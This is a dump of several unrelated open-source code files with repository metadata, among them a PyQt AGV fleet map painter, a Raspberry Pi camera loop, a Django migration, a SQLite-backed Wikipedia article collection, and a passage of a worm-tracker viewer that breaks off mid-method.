6698de943e743d11300f391dd839dad9369a9914 | c2f4afee3ec4faef7231da2e48c8fef3d309b3e3 | /AppendFile.py | 7fcd0d08932bb7aacd4bdcc2a8461d8776ca7cac | [] | no_license | tanu312000/pyChapter | a723f99754ff2b21e694a9da3cb2c6ca0cd10fce | 2fd28aefcbfaf0f6c34db90fdf0d77f9aea142ce | refs/heads/master | 2020-05-03T15:51:34.334806 | 2019-03-31T16:17:45 | 2019-03-31T16:17:45 | 178,712,059 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | '''#WAP to read line by line from keyboard & append to a list until n times. Break the loop under break condition.
#Step:1
# 1)ReadLine from keyboard
Line=input("Enter a Line"+"\n")
# 2)Append in the list
li=[]
li.append(Line)
# 3)Until n times
while True:
Status=input("Do you want to continue")
# 4)Break the condition
if(Status=="no"):
break
print("Success")
# 5)Write in a file'''
# Append user-typed lines to AppendFile.txt until the user answers exactly "No".
fp=open("/home/tanu/programs/pythonFiles/AppendFile.txt",'a')
li=[]
while True:
    Line=(input("Enter a line")+"\n")
    li.append(Line)
    Status=input("Do you want to Continue")
    # Only the exact answer "No" stops the loop; any other reply keeps reading.
    if(Status=="No"):
        print("Success")
        break
# Lines are buffered in 'li' and flushed to disk in one go after the loop ends.
fp.writelines(li)
fp.close()
| [
"tanurocks90@gmail.com"
] | tanurocks90@gmail.com |
c361dedd1d0804ff593bc36fb18646206b67bd9a | 289697340c92e61dacbb921b7fd63201e7056eea | /agv2/Paint.py | 761918a9305fd2b0c163a661786923f90080b35c | [] | no_license | zhenhuic/projects-summary | 51a5c6e1411c69d96491a7775d7ce1ae8a1714bd | bb7dce6b5e2b18d783bec6dddca203721462e709 | refs/heads/master | 2022-12-30T22:24:14.788445 | 2020-10-23T13:13:34 | 2020-10-23T13:13:34 | 252,084,716 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 17,313 | py | import sys, math
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import Qt, QRect
import time
#from carshow import Ui_mainwindow
# 读取所有点的数据 并用字典 id:[x,y]存储
def readpoints():
points = {}
with open('newpoint1.txt') as f:
for line in f:
point = line.split(',', -1)[0].strip()
x = line.split(',', -1)[1].strip()
y = line.split(',', -1)[2].strip()
points[point] = [x, y]
return points
class draw(QLabel):
def __init__(self, *__args):
super().__init__(*__args)
#self.data = {1: 1, 2: 89, 3: 2, 4: 34, 5: 56, 6: 6, 7: 55, 8: 7, 9: 78}
self.data = {'carStart1': 82, 'carStart2': 825, 'carStart3': 13675, 'carStart4': 666,
'carStart5': 89, 'carStart6': 566, 'carStart7': 372, 'carStart8': 333, 'carStart9': 582,
'carFault1': "故障", 'carFault2': "无故障", 'carFault3': "无故障", 'carFault4': "无故障",
'carFault5': "无故障", 'carFault6': "故障", 'carFault7': "无故障", 'carFault8': "故障", 'carFault9': "无故障",
'carState1': "空闲", 'carState2': "挂起", 'carState3': "运行", 'carState4': "运行",
'carState5': "空闲", 'carState6': "运行", 'carState7': "空闲", 'carState8': "运行", 'carState9': "运行",
'faultCode1': '500', 'faultCode6': '511', 'faultCode8': '514', 'carAction1': "取货",
'carAction2': "取货", 'carAction3': "取货", 'carAction4': "取货", 'carAction5': "送货", 'carAction6': "送货",
'carAction7': "送货", 'carAction8': "二期取货", 'carAction9': "二期取货",'carNumber1': '1',
'carNumber2': '2', 'carNumber3': '3', 'carNumber4': '4', 'carNumber5': '5',
'carNumber6': '6', 'carNumber7': '7', 'carNumber8': '8', 'carNumber9': '9'}
def paintEvent(self, event):
# 故障小车数量num1 运行小车数量num2 空闲小车数量num3 挂起、静态操作 逻辑离线小车数量num4
num1, num2, num3, num4 = 0, 0, 0, 0
# 小车不同状态的具体车号
guzhang = ''
yunxing = ''
kongxian = ''
qita = ''
points = readpoints()
size = self.size()
painter = QPainter()
painter.begin(self)
# painter.setBrush(Qt.black)
painter.drawRect(self.rect())
faultCodes = {'500': '发现障碍', '501': '用户暂停', '502': '控制台避免碰撞', '503': '发生碰撞', '504': '地标丢失',
'505': '急停按钮按下', '506': '导航信号弱', '507': '电池故障', '508': '伺服轴超差', '509': '伺服驱动器故障',
'510': '伺服电源故障', '511': '从等待状态退出', '512': '临时停车', '513': '通讯中断', '514': 'MCU的CAN通讯中断',
'515': '设备故障', '516': '舱限位开关作用', '517': '失速保护', '518': 'MCU的ALL-OK信号中断', '519': 'PLS安全继电器故障',
'520': 'PLS急停', '521': '电池异常', '522': '电池电压低', '523': '电池电压过低', '524': '电池系统故障',
'525': '同步传感器故障', '526': 'MCU通讯故障', '527': 'IO扩展块故障', '528': '上线节点不匹配', '529': '货物验证错误',
'530': '死锁无法解除', '531': '机械臂故障', '532': '地标传感器故障', '533': '导航传感器故障', '534': '路由搜索不通'}
# 画宽路
pen = QPen(QColor(0, 255, 128))
painter.setPen(pen)
painter.setBrush(QColor(0, 255, 128))
# 节点448 至 358
x = (-80.584 + 130) / 130 * size.width()
y = (163 - 133) / 90 * size.height()
painter.drawRect(x, y, 75.251 / 130 * size.width(), 2 / 90 * size.height())
# 节点987 至 931
x = (-125.663 + 130) / 130 * size.width()
y = (163 - 121.2) / 90 * size.height()
painter.drawRect(x, y, 58.135 / 130 * size.width(), 2 / 90 * size.height())
# 节点 160 至 82
x = (-80.584 + 130) / 130 * size.width()
y = (163 - 103) / 90 * size.height()
painter.drawRect(x, y, 73.751 / 130 * size.width(), 2 / 90 * size.height())
# 节点 1043 至 897
x = (-98.401 + 130) / 130 * size.width()
y = (163 - 82.8) / 90 * size.height()
painter.drawRect(x, y, 26.911 / 130 * size.width(), 2 / 90 * size.height())
# 节点 380 至 82
x = (-7.2 + 130) / 130 * size.width()
y = (163 - 151.5) / 90 * size.height()
painter.drawRect(x, y, 2.18 / 130 * size.width(), 50.5 / 90 * size.height())
# 节点 448 至 562
x = (-83 + 130) / 130 * size.width()
y = (163 - 133) / 90 * size.height()
painter.drawRect(x, y, 2.8 / 130 * size.width(), 52.8 / 90 * size.height())
pen = QPen(QColor(200, 200, 200), 1.5, Qt.SolidLine)
painter.setPen(pen)
# 画路线
with open('linearg1.txt') as f:
for line in f:
point1 = line.split(',', -1)[1].strip()
point2 = line.split(',', -1)[2].strip()
x1 = (float(points[point1][0]) + 130) / 130 * size.width()
y1 = (163 - float(points[point1][1])) / 90 * size.height()
x2 = (float(points[point2][0]) + 130) / 130 * size.width()
y2 = (163 - float(points[point2][1])) / 90 * size.height()
painter.drawLine(x1, y1, x2, y2)
# 画点
# with open('newpoint1.txt') as f:
# for line in f:
# x = float(line.split(',', -1)[1].strip())
# y = float(line.split(',', -1)[2].strip())
# point = line.split(',', -1)[0].strip()
# x = (x + 130) / 130
# y = (155 - y) / 90
# x = x * 1920
# y = y * 1080
#
# pen = QPen(QColor(128, 0, 0), 3) # 3是画笔的粗细
# painter.setPen(pen)
# painter.drawPoint(x, y)
# # painter.drawArc(x, y, 3, 3, 0, 360*16)
# # pen = QPen(QColor(60,179,113), 1)
# pen = QPen(Qt.darkGreen)
# painter.setPen(pen)
# painter.setFont(QFont('Times New Roman', 7))
# painter.drawText(x + 3, y - 1, point)
#pen = QPen(QColor(141, 141, 212))
pen = QPen(QColor(60, 60, 60))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 14))
painter.drawText(0.0677 * size.width(), 0.4109 * size.height(), '装箱线1号库')
painter.drawText(0.0187 * size.width(), 0.4409 * size.height(), '装箱线2号库')
painter.drawText(0.4427 * size.width(), 0.5446 * size.height(), '旧萨瓦取货库位')
painter.drawText(0.4149 * size.width(), 0.9609 * size.height(), '新萨瓦取货库位')
painter.drawText(0.9004 * size.width(), 0.1093 * size.height(), '手工焊接缓存库位')
painter.drawText(0.9071 * size.width(), 0.1732 * size.height(), '充电站')
painter.drawText(0.5078 * size.width(), 0.7031 * size.height(), '机器人1缓存库位')
painter.drawText(0.5500 * size.width(), 0.6401 * size.height(), '机器人取货库位')
painter.drawText(0.6338 * size.width(), 0.7040 * size.height(), '机器人2缓存库位')
painter.drawText(0.7218 * size.width(), 0.7089 * size.height(), '自动焊接取货库位')
painter.drawText(0.2013 * size.width(), 0.3931 * size.height(), '货物库位缓存区')
painter.drawText(0.4020 * size.width(), 0.5595 * size.height(), '充电站')
painter.drawText(0.3723 * size.width(), 0.9762 * size.height(), '充电站')
painter.drawText(0.4697 * size.width(), 0.7277 * size.height(), '停车站')
painter.drawText(0.1630 * size.width(), 0.4438 * size.height(), '停车站')
painter.drawText(0.2114 * size.width(), 0.4271 * size.height(), '停车站')
painter.drawText(0.3494 * size.width(), 0.4271 * size.height(), '停车站')
painter.drawText(0.2906 * size.width(), 0.3931 * size.height(), '停车站')
for i in range(1, 10):
# if str(self.data[i]) in points:
# print('dsds')
# x = (float(points[str(self.data[i])][0]) + 130) / 130 * 1920
# y = (155 - float(points[str(self.data[i])][1])) / 90 * 1080
# painter.drawEllipse(x - 10, y - 10, 20, 20)
# #pen = QPen(QColor(255, 240, 245))
# pen = QPen(QColor(0, 0, 0))
# painter.setPen(pen)
# painter.drawText(x - 4, y + 6, str(i))
if str(self.data['carStart' + str(i)]) in points:
pen = QPen(QColor(255, 162, 117))
painter.setPen(pen)
painter.setBrush(QColor(255, 162, 117))
x = (float(points[str(self.data['carStart' + str(i)])][0]) + 130) / 130 * size.width()
y = (163 - float(points[str(self.data['carStart' + str(i)])][1])) / 90 * size.height()
# 描述每辆非故障小车的当前动作
if str(self.data['carFault' + str(i)]) != "故障":
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 24, QFont.Bold))
#painter.drawText(70 + (i - 1) * size.width() * 0.095, 210, str(self.data['carState' + str(i)]))
# 判断是否空闲 为绿
if str(self.data['carState' + str(i)]) == "空闲":
kongxian = kongxian + str(self.data['carNumber' + str(i)]) + '号 '
num3 = num3 + 1
pen = QPen(QColor(0, 128, 0))
painter.setPen(pen)
painter.setBrush(QColor(0, 128, 0))
elif str(self.data['carState' + str(i)]) == "运行":
yunxing = yunxing + str(self.data['carNumber' + str(i)]) + '号 '
num2 = num2 + 1
pen = QPen(QColor(0, 128, 255))
painter.setPen(pen)
painter.setBrush(QColor(0, 128, 255))
elif str(self.data['carState' + str(i)]) == "挂起" or str(self.data['carState' + str(i)]) == "静态" or str(self.data['carState' + str(i)]) == "离线":
qita = qita + str(self.data['carNumber' + str(i)]) + '号 '
num4 = num4 + 1
pen = QPen(QColor(162, 162, 162))
painter.setPen(pen)
painter.setBrush(QColor(162, 162, 162))
# 判断是否故障 为红
if str(self.data['carFault' + str(i)]) == "故障":
self.data['carState' + str(i)] = '故障'
# print("故障")
guzhang = guzhang + str(self.data['carNumber' + str(i)]) + '号 '
pen = QPen(QColor(255, 60, 60), 1.5, Qt.SolidLine)
painter.setPen(pen)
painter.drawLine(x, y, x - 23, y - 17)
# painter.setBrush(QColor(192, 192, 192))
painter.setBrush(Qt.NoBrush)
painter.drawEllipse(x - 155, y - 40, 130, 30)
if self.data['faultCode' + str(i)] in faultCodes:
code = self.data['faultCode' + str(i)]
painter.setFont(QFont('微软雅黑', 13, QFont.Bold))
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.drawText(x - 140, y - 15, faultCodes[code])
num1 = num1 + 1
pen = QPen(QColor(255, 60, 60))
painter.setPen(pen)
painter.setBrush(QColor(255, 60, 60))
# painter.drawEllipse(x - 10, y - 10, 20, 20)
painter.drawRect(x - 12.5, y - 10, 25, 20)
pen = QPen(QColor(255, 255, 255))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 14, QFont.Bold))
painter.drawText(x - 4, y + 6, str(self.data['carNumber' + str(i)]))
#显示各小车的顶部状态栏
painter.drawEllipse(30 + (i-1) * size.width() * 0.095, 70, 150, 150)
pen = QPen(QColor(255, 255, 255))
painter.setPen(pen)
painter.setBrush(QColor(255, 255, 255))
painter.drawEllipse(75 + (i - 1) * size.width() * 0.095, 115, 60, 60)
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 28, QFont.Bold))
painter.drawText(97 + (i - 1) * size.width() * 0.095, 160, str(self.data['carNumber' + str(i)]))
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 24, QFont.Bold))
painter.drawText(70 + (i - 1) * size.width() * 0.095, 210, str(self.data['carState' + str(i)]))
elif str(self.data['carStart' + str(i)]).isdigit():
pen = QPen(QColor(0, 128, 255))
painter.setPen(pen)
painter.setBrush(QColor(0, 128, 255))
# pen = QPen(QColor(162, 162, 162))
# painter.setPen(pen)
# painter.setBrush(QColor(162, 162, 162))
painter.drawEllipse(30 + (i - 1) * size.width() * 0.095, 70, 150, 150)
pen = QPen(QColor(255, 255, 255))
painter.setPen(pen)
painter.setBrush(QColor(255, 255, 255))
painter.drawEllipse(75 + (i - 1) * size.width() * 0.095, 115, 60, 60)
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 28, QFont.Bold))
painter.drawText(97 + (i - 1) * size.width() * 0.095, 160, str(self.data['carNumber' + str(i)]))
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 24, QFont.Bold))
painter.drawText(70 + (i - 1) * size.width() * 0.095, 210, str(self.data['carState' + str(i)]))
#painter.drawText(70 + (i - 1) * size.width() * 0.095, 210, '暂无')
# 显示 故障小车数量num1 运行小车数量num2 空闲小车数量num3 挂起、静态操作 逻辑离线小车数量num4
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 16))
painter.drawText(0.0507 * size.width(), 0.5966 * size.height(), '故障小车---')
painter.drawText(0.0507 * size.width(), 0.6366 * size.height(), '运行小车---')
painter.drawText(0.0507 * size.width(), 0.6766 * size.height(), '空闲小车---')
painter.drawText(0.0077 * size.width(), 0.7166 * size.height(), '挂起、静态、离线---')
pen = QPen(QColor(255, 60, 60))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 16, QFont.Bold))
#painter.setFontPointSize(QFont.Bold)
painter.drawText(0.1287 * size.width(), 0.5966 * size.height(), guzhang)
pen = QPen(QColor(0, 128, 255))
painter.setPen(pen)
painter.drawText(0.1287 * size.width(), 0.6366 * size.height(), yunxing)
pen = QPen(QColor(0, 128, 0))
painter.setPen(pen)
painter.drawText(0.1287 * size.width(), 0.6766 * size.height(), kongxian)
pen = QPen(QColor(162, 162, 162))
painter.setPen(pen)
painter.drawText(0.1187 * size.width(), 0.7166 * size.height(), qita)
pen = QPen(QColor(255, 60, 60))
painter.setPen(pen)
painter.setFont(QFont('微软雅黑', 16))
painter.setBrush(QColor(255, 60, 60))
# painter.drawEllipse(0.0477 * size.width(), 0.5726 * size.height(), 15, 15)
painter.drawRect(0.0687 * size.width(), 0.7526 * size.height(), 20, 15)
pen = QPen(QColor(0, 128, 255))
painter.setPen(pen)
painter.setBrush(QColor(0, 128, 255))
painter.drawRect(0.0687 * size.width(), 0.7806 * size.height(), 20, 15)
pen = QPen(QColor(0, 128, 0))
painter.setPen(pen)
painter.setBrush(QColor(0, 128, 0))
painter.drawRect(0.0687 * size.width(), 0.8086 * size.height(), 20, 15)
pen = QPen(QColor(162, 162, 162))
painter.setPen(pen)
painter.setBrush(QColor(162, 162, 162))
painter.drawRect(0.0687 * size.width(), 0.8366 * size.height(), 20, 15)
pen = QPen(QColor(0, 0, 0))
painter.setPen(pen)
painter.drawText(0.091 * size.width(), 0.767 * size.height(), '---- 故障')
painter.drawText(0.091 * size.width(), 0.795 * size.height(), '---- 运行中')
painter.drawText(0.091 * size.width(), 0.823 * size.height(), '---- 空闲')
painter.drawText(0.091 * size.width(), 0.851 * size.height(), '---- 挂起、静态、离线')
painter.end()
| [
"zhenhuiccc@gmail.com"
] | zhenhuiccc@gmail.com |
cc3f3c2352289d73e494b36f97e557535e657bed | c8bf3e2b94fe9a296e688cbb419563e0fa77c9c3 | /test_video.py | 5aefa09fb132c217bc47f87f01f18b8c6a0c5315 | [] | no_license | josefmtd/test-cv | 306884b4c185db6dbf02a683ccd0866c053f402a | ee40195bff27be068e58bccfa5ae0f60d9b6db68 | refs/heads/master | 2020-03-20T09:34:30.164397 | 2018-06-15T03:57:20 | 2018-06-15T03:57:20 | 137,341,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 821 | py | # import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
import time
import cv2
# initialize the camera and grab a reference to the raw camera capture
camera = PiCamera()
camera.resolution = (640,480)
camera.framerate = 32
rawCapture = PiRGBArray(camera, size=(640, 480))
# allow the camera to warmup
time.sleep(0.1)
# capture frames from the camera
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
# grab the raw NumPy array representing the image, then initialize the timestamp
# and occupied/unoccupied text
image = frame.array
# show the frame
cv2.imshow("Frame", image)
key = cv2.waitKey(1) & 0xFF
# clear the stream
rawCapture.truncate(0)
# if the 'q' key was pressed, break from the loop
if key == ord("q"):
break
| [
"josstemat@gmail.com"
] | josstemat@gmail.com |
9090363a9ae18d37db75ef5f9cfa91a9746969d5 | 054b2c78cf70a81823da522f1bb5889f42787365 | /mudao/ui/__init__.py | 78dc516a1d30d973d1d13ab0207c9f1ca480fe43 | [] | no_license | musum/mudao | 9537ca1f6262b1271f9c4f6a247e00549762d254 | fbf8c507aa6e1755ac4126d7e4d75ace99b97fd4 | refs/heads/master | 2020-03-26T16:27:59.967129 | 2018-11-11T10:40:46 | 2018-11-11T10:40:46 | 145,103,715 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 115 | py | from mudao.ui.uiFile import FilePannel
from mudao.ui.uiCmd import CmdPannel
from mudao.ui.uiMain import MainWindow
| [
"test@test.com"
] | test@test.com |
33f06e48105dd16509b58527c0eed07ca7ed05a6 | bc441bb06b8948288f110af63feda4e798f30225 | /cmdb_sdk/model/notify/subscriber_pb2.pyi | f37ead231f841e671f9d1f218fbe6e05d86a7244 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,884 | pyi | # @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
from cmdb_sdk.model.notify.subscribe_info_pb2 import (
SubscribeInfo as cmdb_sdk___model___notify___subscribe_info_pb2___SubscribeInfo,
)
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
)
from google.protobuf.internal.containers import (
RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from typing import (
Iterable as typing___Iterable,
Optional as typing___Optional,
Text as typing___Text,
Union as typing___Union,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
if sys.version_info < (3,):
builtin___buffer = buffer
builtin___unicode = unicode
class Subscriber(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
name = ... # type: typing___Text
admin = ... # type: typing___Text
callback = ... # type: typing___Text
ensName = ... # type: typing___Text
procNum = ... # type: builtin___int
msgType = ... # type: builtin___int
retry = ... # type: builtin___int
@property
def subscribeInfo(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[cmdb_sdk___model___notify___subscribe_info_pb2___SubscribeInfo]: ...
def __init__(self,
*,
name : typing___Optional[typing___Text] = None,
admin : typing___Optional[typing___Text] = None,
callback : typing___Optional[typing___Text] = None,
ensName : typing___Optional[typing___Text] = None,
procNum : typing___Optional[builtin___int] = None,
msgType : typing___Optional[builtin___int] = None,
retry : typing___Optional[builtin___int] = None,
subscribeInfo : typing___Optional[typing___Iterable[cmdb_sdk___model___notify___subscribe_info_pb2___SubscribeInfo]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Subscriber: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Subscriber: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"admin",b"admin",u"callback",b"callback",u"ensName",b"ensName",u"msgType",b"msgType",u"name",b"name",u"procNum",b"procNum",u"retry",b"retry",u"subscribeInfo",b"subscribeInfo"]) -> None: ...
| [
"service@easyops.cn"
] | service@easyops.cn |
89fdc67025f1d1105bd747a337937acde1171361 | e9d25b27509087df06acb685fe08a335fb72113b | /project_stock/project_stock/migrations/0006_auto_20160511_1246.py | 7c576a85e507cfa8dec282f8817ba396e01ba9e6 | [] | no_license | cenh/ProjectStockSD | 32cfa4d9ee6b8b81a0faaac47a1fc545476f92c0 | 7611c6a9152a9a8d0dc237eb12bf604fdd718c2f | refs/heads/master | 2020-05-20T06:03:50.960284 | 2016-06-15T10:23:52 | 2016-06-15T10:23:52 | 51,740,226 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-05-11 10:46
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('project_stock', '0005_project_end_date'),
]
operations = [
migrations.AlterField(
model_name='project',
name='subject',
field=models.CharField(blank=True, default='', max_length=128),
),
]
| [
"ninjalf2@gmail.com"
] | ninjalf2@gmail.com |
c868dac673e8b151e58bccdabedd5a1e9275f883 | 115098a64947ccb9310e1f4d8bd44f9ca3eb6821 | /wp.py | 551dde359ea9fc48469d61fa1158ef01fe0eaee2 | [
"MIT"
] | permissive | wakanapo/wpsearch | 73264b34fedaf104d90e59d5187e8ac6a79ffccf | bbf480f02ac4ae0a7a489e9d216c149c3c375dc6 | refs/heads/master | 2020-03-07T13:06:24.376364 | 2018-03-29T23:47:21 | 2018-03-29T23:47:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,493 | py | import sqlite3
import sys
import json
class Document():
    """Base interface for a single document in a collection.

    Concrete subclasses must supply a unique identifier and the document's
    plain text.
    """

    def id(self):
        """Unique identifier of this Document within its Collection.

        Returns:
            The id; must be unique within the Collection.
        """
        raise NotImplementedError

    def text(self):
        """Plain text contents of this Document.

        Returns:
            The document text.
        """
        raise NotImplementedError
class Collection():
    """Base interface for a set of Documents addressable by id."""

    def get_document_by_id(self, id):
        """Look up a single Document by its id.

        Returns:
            Document: The Document stored under the given id.
        """
        raise NotImplementedError

    def num_documents(self):
        """Count the documents held by this collection.

        Returns:
            int: How many documents the collection contains.
        """
        raise NotImplementedError

    def get_all_documents(self):
        """Iterate over every Document in the collection.

        Returns:
            Iterable[Document]: All the documents in the collection.
        """
        raise NotImplementedError
class WikipediaArticle(Document):
    """A single Wikipedia article.

    Attributes:
        title (str): Unique title; doubles as the document id. Always < 256 bytes.
        _text (str): Plain-text article body.
        opening_text (str): First paragraph of the body.
        auxiliary_text (List[str]): Auxiliary text, usually from the infobox.
        categories (List[str]): Category names.
        headings (List[str]): Section headings (the table of contents).
        wiki_text (str): Raw MediaWiki markup source.
        popularity_score (float): Popularity indicator; bigger is more popular.
        num_incoming_links (int): Intra-Wikipedia links pointing at this article.
    """

    def __init__(self, collection, title, text, opening_text, auxiliary_text, categories, headings, wiki_text, popularity_score, num_incoming_links):
        # `collection` is accepted for symmetry with the factory calls but is
        # not retained, matching the original behaviour.
        self.title = title
        self._text = text
        self.opening_text = opening_text
        self.auxiliary_text = auxiliary_text  # list of strings
        self.categories = categories
        self.headings = headings
        self.wiki_text = wiki_text
        self.popularity_score = popularity_score
        self.num_incoming_links = num_incoming_links

    def id(self):
        """Return the article's id (its title).

        Overrides Document.

        Returns:
            str: the title, which serves as the unique id.
        """
        return self.title

    def text(self):
        """Return the article's plain-text body.

        Overrides Document.

        Returns:
            str: the plain-text content.
        """
        return self._text
class WikipediaCollection(Collection):
    """A Collection of WikipediaArticles backed by a SQLite database."""

    def __init__(self, filename):
        # Lazily-filled cache for num_documents().
        self._cached_num_documents = None
        self.db = sqlite3.connect(filename)

    def _make_article(self, title, row):
        # Build a WikipediaArticle from the 8 non-title columns, decoding the
        # JSON-encoded list columns along the way.
        (text, opening_text, auxiliary_text, categories, headings,
         wiki_text, popularity_score, num_incoming_links) = row
        return WikipediaArticle(self,
                                title,
                                text,
                                opening_text,
                                json.loads(auxiliary_text),
                                json.loads(categories),
                                json.loads(headings),
                                wiki_text,
                                popularity_score,
                                num_incoming_links)

    def find_article_by_title(self, query):
        """Find the article whose title matches `query`.

        Returns:
            WikipediaArticle: the matching article, or None if absent.
        """
        cursor = self.db.cursor()
        row = cursor.execute("SELECT title, text, opening_text, auxiliary_text, categories, headings, wiki_text, popularity_score, num_incoming_links FROM articles WHERE title=?", (query,)).fetchone()
        if row is None:
            return None
        return self._make_article(row[0], row[1:])

    def get_document_by_id(self, doc_id):
        """Get the WikipediaArticle for the given id (its title).

        Overrides Collection.

        Returns:
            WikipediaArticle: the article for `doc_id`, or None if absent.
        """
        cursor = self.db.cursor()
        row = cursor.execute("SELECT text, opening_text, auxiliary_text, categories, headings, wiki_text, popularity_score, num_incoming_links FROM articles WHERE title=?", (doc_id,)).fetchone()
        if row is None:
            return None
        return self._make_article(doc_id, row)

    def num_documents(self):
        """Return the number of articles, caching the count after first use.

        Overrides Collection.

        Returns:
            int: the article count.
        """
        if self._cached_num_documents is None:
            cursor = self.db.cursor()
            (count,) = cursor.execute("SELECT COUNT(*) FROM articles").fetchone()
            self._cached_num_documents = count
        return self._cached_num_documents

    def get_all_documents(self):
        """Yield every WikipediaArticle in the collection.

        Overrides Collection.

        Returns:
            Iterable[WikipediaArticle]: all articles, fetched in batches.
        """
        cursor = self.db.cursor()
        cursor.execute("SELECT title, text, opening_text, auxiliary_text, categories, headings, wiki_text, popularity_score, num_incoming_links FROM articles")
        # Fetch in fixed-size batches to bound memory use.
        while True:
            batch = cursor.fetchmany(1000)
            if not batch:
                break
            for row in batch:
                yield self._make_article(row[0], row[1:])
| [
"keishi.hattori@gmail.com"
] | keishi.hattori@gmail.com |
011d3b37d7cb2a349a9f335003c370504e1fc868 | 26fb93b2df4b6226e708027beccb2f0d442a4522 | /MWTracker/GUI_Qt4/SWTrackerViewer/SWTrackerViewer_GUI.py | fbf28e5f0a9297acd767443f273c16285271614c | [] | no_license | KezhiLi/Multiworm_Tracking | bb4fd1d1beeab26f4402f5aa5a3f159700fa0009 | cd91e968a557957e920d61db8bc10957666b6bc2 | refs/heads/master | 2021-01-22T16:10:23.591064 | 2016-04-13T15:51:18 | 2016-04-13T15:51:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,201 | py | import sys
from PyQt4.QtGui import QApplication, QMainWindow, QFileDialog, QMessageBox, QFrame
from PyQt4.QtCore import QDir, QTimer, Qt, QPointF
from PyQt4.QtGui import QPixmap, QImage, QPainter, QColor, QFont, QPolygonF, QPen
from MWTracker.GUI_Qt4.SWTrackerViewer.SWTrackerViewer_ui import Ui_ImageViewer
from MWTracker.GUI_Qt4.MWTrackerViewerSingle.MWTrackerViewerSingle_GUI import MWTrackerViewerSingle_GUI
from MWTracker.trackWorms.getSkeletonsTables import getWormMask, binaryMask2Contour
from MWTracker.intensityAnalysis.correctHeadTailIntensity import createBlocks, _fuseOverlapingGroups
import tables, os
import numpy as np
import pandas as pd
import cv2
import json
class SWTrackerViewer_GUI(MWTrackerViewerSingle_GUI):
    # Single-worm tracker viewer: extends MWTrackerViewerSingle_GUI with
    # skeleton-block navigation and stage-movement highlighting.

    def __init__(self, ui = ''):
        if not ui:
            super().__init__(Ui_ImageViewer())
        else:
            super().__init__(ui)
        self.skel_block = []      # list of (start_frame, end_frame) skeleton blocks
        self.skel_block_n = 0     # index of the currently selected block
        self.is_stage_move = []   # per-frame flags: truthy while the stage moves
        self.ui.spinBox_skelBlock.valueChanged.connect(self.changeSkelBlock)

    def updateSkelFile(self):
        super().updateSkelFile()
        # Rebuild the skeleton-block list from provenance metadata stored in
        # the skeletons HDF5 file, when present.
        with tables.File(self.skel_file, 'r') as fid:
            if '/provenance_tracking/INT_SKE_ORIENT' in fid:
                prov_str = fid.get_node('/provenance_tracking/INT_SKE_ORIENT').read()
                func_arg_str = json.loads(prov_str.decode("utf-8"))['func_arguments']
                # gap_size used by the intensity-based skeleton orientation step.
                gap_size = json.loads(func_arg_str)['gap_size']
                good = (self.trajectories_data['int_map_id']>0).values
                has_skel_group = createBlocks(good, min_block_size = 0)
                self.skel_block = _fuseOverlapingGroups(has_skel_group, gap_size = gap_size)
            else:
                self.skel_block = []

        # Keep the block spin box within the valid index range.
        self.ui.spinBox_skelBlock.setMaximum(max(len(self.skel_block)-1,0))
        self.ui.spinBox_skelBlock.setMinimum(0)

        if self.skel_block_n != 0:
            self.skel_block_n = 0
            self.ui.spinBox_skelBlock.setValue(0)
        else:
            # Value unchanged, so the signal would not fire; refresh manually.
            self.changeSkelBlock(0)

        # Load per-frame stage-movement flags (NaN stage vector == moving).
        with tables.File(self.skel_file, 'r') as fid:
            if '/stage_movement/stage_vec' in fid:
                self.is_stage_move = np.isnan(fid.get_node('/stage_movement/stage_vec')[:,0])
            else:
                self.is_stage_move = []

    def updateImage(self):
        self.readImage()
        self.drawSkelResult()

        # Draw a red border around frames recorded while the stage was moving.
        if len(self.is_stage_move) > 0 and self.is_stage_move[self.frame_number]:
